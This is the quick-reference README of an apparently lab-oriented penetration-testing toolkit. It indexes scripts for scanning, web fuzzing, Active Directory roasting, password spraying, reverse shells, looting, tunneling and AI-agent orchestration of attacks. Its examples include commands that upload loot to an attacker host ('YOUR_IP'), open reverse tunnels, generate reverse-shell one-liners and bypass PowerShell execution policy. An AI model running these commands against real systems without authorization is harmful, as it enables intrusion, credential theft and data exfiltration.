# PentestPilot - Quick Reference

For step‑by‑step usage, pipeline semantics, dashboard features, and resume behavior, read HOWTO.md:1. This file focuses on a clickable, categorized command index with succinct usage. Most entries accept TARGET via env if a positional argument is omitted.

## Table of Contents
- [Setup](#setup)
- [Core Workflow](#core-workflow)
- [Enumeration](#enumeration-requires-target)
- [Automation](#automation-binautomation--see-howto-automation--orchestration-dashboard-manifest)
- [Web helpers](#web-helpers-binweb--see-howto-web-recon--routing)
- [Reverse shells](#reverse-shells-binshells)
- [File transfer](#file-transfer-bintransfer)
- [Crypto / Text](#crypto--text-bincrypto)
- [Privilege Escalation](#privilege-escalation-binprivesc)
- [Misc](#misc-binmisc)
- [AI](#ai-binai--see-howto-ai-integrations)
- [Active Directory](#active-directory-binad)
- [Passwords](#passwords-binpasswords)
- [Windows](#windows-binwindows)
- [Post-Exploitation](#post-exploitation-binpost)
- [DNS](#dns-bindns)
- [Scanning](#scanning-binscan)
- [Tunnels](#tunnels-bintunnel)
- [Pwn](#pwn-binpwn)
- [Hashes](#hashes-binhashes)
- [Tips](#tips)

## Setup
- Keep this repo in a working folder, e.g., htb/.
- Source the shell helpers from your main zshrc:
  echo "source $(pwd)/.zshrc.htb" >> ~/.zshrc
- Open a new shell or run: source .zshrc.htb

## Core Workflow
- settarget <ip_or_host>
  - Creates targets/<target> with scans, loot, www, exploits.
  - Sets OUTDIR to the target’s scans directory.
 - ar        → auto_recon: quick scan, optional UDP, basic web enum
 - webrecon  → run web_recon on detected web ports
 - wideweb   → wide_web_recon on a list
 - notesinit → scaffold notes.md in target directory
 - notesattach → append scan artifacts summary to notes

## Enumeration (requires TARGET)
- nq        → Quick nmap: scripts + versions
- nf        → Full TCP: -p- then service/version
- nu        → UDP top 200
- smb       → SMB enumeration (anon by default)
- snmp      → SNMP enumeration (community defaults to public)

Individual scripts (bin/)
- nmap_quick.sh <target>
- nmap_full.sh <target> [--rate 5000]
- nmap_udp.sh <target> [--top 200]
- smb_enum.sh <ip> [user] [pass]
- ldap_enum.sh <ip> [user] [pass] - auto-detect baseDNs
- nfs_enum.sh <ip>
- ftp_enum.sh <ip>
- snmp_enum.sh <ip> [community]

## Automation (bin/automation/) (see HOWTO: [Automation & Orchestration](HOWTO.md#automation--orchestration), [Dashboard](HOWTO.md#dashboard-status--evidence), [Manifest](HOWTO.md#manifest-state--resume))
- auto_recon.sh <target> [--no-udp]
- parse_nmap_open_ports.sh <*.gnmap>
- report_summary.py <*.gnmap ...>
- web_recon.sh <target|--url <url>>
- loot_pack.sh [dir]
- wide_web_recon.sh <hosts.txt>
- notes_init.sh <target>
- notes_attach.sh <target>
- full_pipeline.sh <domain|hosts.txt> [--resume|--force]
- manifest.py (init|set|get|addlist|show|task|taskstatus|taskreset) <target> [...]
- dashboard.py [--json]
- resume_all.py - resume full pipeline across all targets
 - tech_actions.py <target> [--run] - suggest/run next steps based on httpx techs
 - cleanup_scans.sh [dir] [days] [--force] - prune old scan files
 - proxy_toggle.sh on|off [http://host:port]
 - tmux_init.sh [session] - starter tmux layout

See also in HOWTO.md:
- Automation & Orchestration
- Dashboard (Status & Evidence)
- Manifest (State & Resume)

Examples
```
# One‑click pipeline (resume‑aware)
full_pipeline.sh target.htb

# Agent‑driven full pipeline with auto tech actions
agent full target.htb

# Dashboard
dashboard --compact

# Resume all incomplete targets
resumeall
```

## Web helpers (bin/web/) (see HOWTO: [Web Recon & Routing](HOWTO.md#web-recon--routing))
- dirbuster.sh <url> [wordlist] [exts] - ffuf directory fuzz
- vhost_ffuf.sh <base-url> <domain> [wordlist] - virtual hosts
- param_fuzz.sh <url-with-FUZZ> [wordlist] - parameter discovery
- lfi_tester.py <url-with-PLACEHOLDER> - basic LFI checks
- tech_detect.sh <url> - headers + tech hints
- http_headers.sh <url> - raw headers
- url_titles.py <url1> [url2 ...] - titles and codes
- crawl_words.py <url> [depth] - extract words for wordlists
- sqli_quick.sh <url> <param> - sqlmap wrapper
 - backup_hunter.sh <base-url> [paths.txt] - find common backups/configs
 - git_dumper.sh <base-url> [outdir] - mirror exposed .git and restore
 - cors_tester.py <url> [origin] - test ACAO/ACAC
 - methods.sh <url> - show allowed methods (OPTIONS)
 - clone_site.sh <url> [outdir] - wget mirror
 - tls_scan.sh <host:443> - openssl-based TLS info
 - robots_grabber.sh <base-url> - show Disallow entries
 - webdav_detect.sh <url> - OPTIONS + PROPFIND
 - httpx_probe.sh <host|file>
 - nuclei_quick.sh <url|file> [tags]
 - gobuster_dir.sh <url> [wordlist] [exts] [threads]
 - httpx_to_nuclei.sh <host|file> [--severity auto|crit|high|med|low] [--tags tags]
 - httpx_tech_route.py <host|file> [--tech list] [--dry-run]
 - httpx_presets.sh <profile> <host|file>
 - gobuster_vhost.sh <url> [wordlist] [threads]
 - wpscan_quick.sh <wordpress-url>
 - jenkins_quick.sh <jenkins-url>
 - sonarqube_quick.sh <sonarqube-url>
 - magento_quick.sh <magento-url>
 - droopescan_quick.sh <url>
 - joomscan_quick.sh <joomla-url>

See also in HOWTO.md:
- Web Recon & Routing

Examples
```
# Alive → nuclei with auto severity
httpx_to_nuclei.sh hosts.txt

# Route by technology and run extras
httpx_tech_route.py urls.txt --tech wordpress,drupal --wpscan --extra

# Vhost brute and directory brute
gobuster_vhost.sh http://$TARGET/ /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
gobuster_dir.sh http://$TARGET/ /usr/share/wordlists/dirb/common.txt php,txt 50
```

## Reverse shells (bin/shells/)
- revsh.py <lhost> <lport> - prints common one-liners
- listener.sh <port> - rlwrap + nc/ncat listener
- tty_upgrade.sh - quick TTY tips

Examples
```
# Listener
listener.sh 4444

# One‑liners to paste on target
revsh.py YOUR_IP 4444

# Upgrade TTY
tty_upgrade.sh
```

## File transfer (bin/transfer/)
- http_serve.sh [port] - simple Python HTTP server
- serve.py [port] - HTTP server with web upload (POST /upload)
- push_http.sh <file> <http://host:port/upload> - upload to serve.py
- dl_oneshots.sh <lhost> <port> <filename> - download one-liners
- smb_server.sh [share] [path] - impacket SMB server

Examples
```
# Simple HTTP
http_serve.sh 8000

# Upload server and push
serve.py 8000
push_http.sh loot.txt http://YOUR_IP:8000/upload

# SMB quick share
smb_server.sh share ./loot
```

## Crypto / Text (bin/crypto/)
- encoders.py b64e|b64d|urle|urld|hex|unhex|xor|rot
- jwt_show.py <jwt> - decode header/payload (no verify)

Examples
```
encoders.py b64e 'secret'; encoders.py urle 'a b'
jwt_show.py eyJhbGciOi...
```

## Privilege Escalation (bin/privesc/)
- linux_quick_enum.sh - basic local recon
- suid_scan.sh - list SUID/SGID
- caps_scan.sh - list file capabilities

Examples
```
linux_quick_enum.sh
caps_scan.sh
```

## Misc (bin/misc/)
- cyclic.py create <len> | offset <needle> - pattern + offset
- port_forward.sh - wrappers for ssh -L/-R/-D
 - extract_urls.py <file...>

Examples
```
cyclic.py create 4000 | cyclic.py offset Aa0A
port_forward.sh -L 8080:127.0.0.1:80 user@host
extract_urls.py notes.md
```

## AI (bin/ai/) (see HOWTO: [AI Integrations](HOWTO.md#ai-integrations))
- ask.py [-m model] [-s system] "prompt" | - (stdin)
- wordlist_from_context.py <target> [context-file|-]
 - orchestrate_web.py <hosts.txt>
 - review_findings.py <notes.md> [extra]
 - commands_planner.py "goal" [context]
 - agent_orchestrator.py <task> - multi-agent runner (web|notes|post|ad)

See also in HOWTO.md:
- AI Integrations

Examples
```
# Plan commands from a goal + context
commands_planner.py "Probe admin portals" urls.txt

# Orchestrate web for a host list
orchestrate_web.py hosts.txt

# Multi‑agent runner
agent web hosts.txt
```

## Active Directory (bin/ad/)
- getnpusers_wrapper.sh <domain/user:pass> <dc_ip> [userlist.txt]
- getspns_wrapper.sh <domain/user:pass> <dc_ip>
- ldap_quick_users.sh <ip> <baseDN> [user pass]
 - rpc_quick.sh <host> [user pass] - rpcclient lsa/users/groups
 - kerbrute_wrapper.sh <domain> <users.txt> [dc-ip]
 - cme_quick.sh <host> [user pass]

Examples
```
getnpusers_wrapper.sh domain/user:pass 10.10.10.5 users.txt
getspns_wrapper.sh domain/user:pass 10.10.10.5
rpc_quick.sh $TARGET
kerbrute_wrapper.sh domain users.txt 10.10.10.5
cme_quick.sh $TARGET user pass
```

## Passwords (bin/passwords/)
- mutate_words.py word1 [word2 ...] | -
- spray_http_basic.sh <url> <users.txt> <password>
 - merge_dedupe.sh <file1> [file2 ...] - dedup merged lists
 - wordlist_cleanup.sh <wordlist> [min] [max]
 - hash_id.sh <hash> - simple guess when hashid missing

Examples
```
mutate_words.py "acme" "winter"
merge_dedupe.sh list1.txt list2.txt > merged.txt
wordlist_cleanup.sh merged.txt 8 64 > cleaned.txt
spray_http_basic.sh http://$TARGET/protected users.txt Winter2025!
```

## Windows (bin/windows/)
 - privesc_quick.ps1 - run on target
 - win_share_enum.ps1 -Target <host>
 - find_unquoted_services.ps1 - potential service path issues
 - find_path_writable.ps1 - writable PATH dirs
 - windows_loot.ps1 - targeted loot collector

Examples
```
powershell -ep bypass -f bin/windows/privesc_quick.ps1
powershell -ep bypass -f bin/windows/win_share_enum.ps1 -Target $TARGET
powershell -ep bypass -f bin/windows/find_unquoted_services.ps1
```

## Post-Exploitation (bin/post/)
 - linux_loot.sh - targeted loot collector with size caps
 - windows_loot.ps1 - targeted loot collector (PowerShell)
 - pack_report.sh <target> - merge loot/scans into markdown report

Examples
```
LOOT_DIR=/tmp/loot MAX_SIZE=10485760 INCLUDE_DB=1 bin/post/linux_loot.sh
bin/post/pack_report.sh $TARGET
```

## DNS (bin/dns/)
- zone_transfer.sh <domain> [ns]
- subenum.sh <domain>
 - gobuster_dns.sh <domain> [wordlist] [threads]

Examples
```
zone_transfer.sh target.htb
gobuster_dns.sh target.htb /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt 100
```

## Scanning (bin/scan/)
- naabu_quick.sh <target> [flags]
- masscan_top.sh <target> [rate]

Examples
```
naabu_quick.sh $TARGET -p 1-65535
masscan_top.sh $TARGET 20000
```

## Tunnels (bin/tunnel/)
- chisel_server.sh <port>
- chisel_client.sh <host:port> R:<lport>:<rhost>:<rport>
- autossh_socks.sh <user@host> [lport]
 - socat_forward.sh -L|-R <lport> <rhost> <rport>

Examples
```
autossh_socks.sh user@pivot 1080
chisel_server.sh 8000 &
chisel_client.sh YOUR_IP:8000 R:8080:127.0.0.1:80
```

## Pwn (bin/pwn/)
 - pwntools_template.py - starter exploit template

Examples
```
python3 bin/pwn/pwntools_template.py REMOTE=1 HOST=$TARGET PORT=31337
```

## Hashes (bin/hashes/)
- extract_ntlm_from_secretsdump.py <file> [out]
 - john_pfx.sh <file.pfx> - john format for PFX

Examples
```
extract_ntlm_from_secretsdump.py secretsdump.out ntlm.txt
john_pfx.sh cert.pfx > pfx.hash
```

## Tips
- OUTDIR controls where scans are saved; set by settarget.
- Most scripts accept TARGET via env if argument omitted.
- If a tool isn’t installed (ffuf, getcap, ldapsearch, snmpwalk), install it or adjust the command.
 - For AI helpers, set OPENAI_API_KEY or run a local Ollama server.
 - Use responsibly and only with explicit authorization.
 - Dashboard flags: --no-color, --compact, --json
  - Read HOWTO.md for detailed guidance and examples.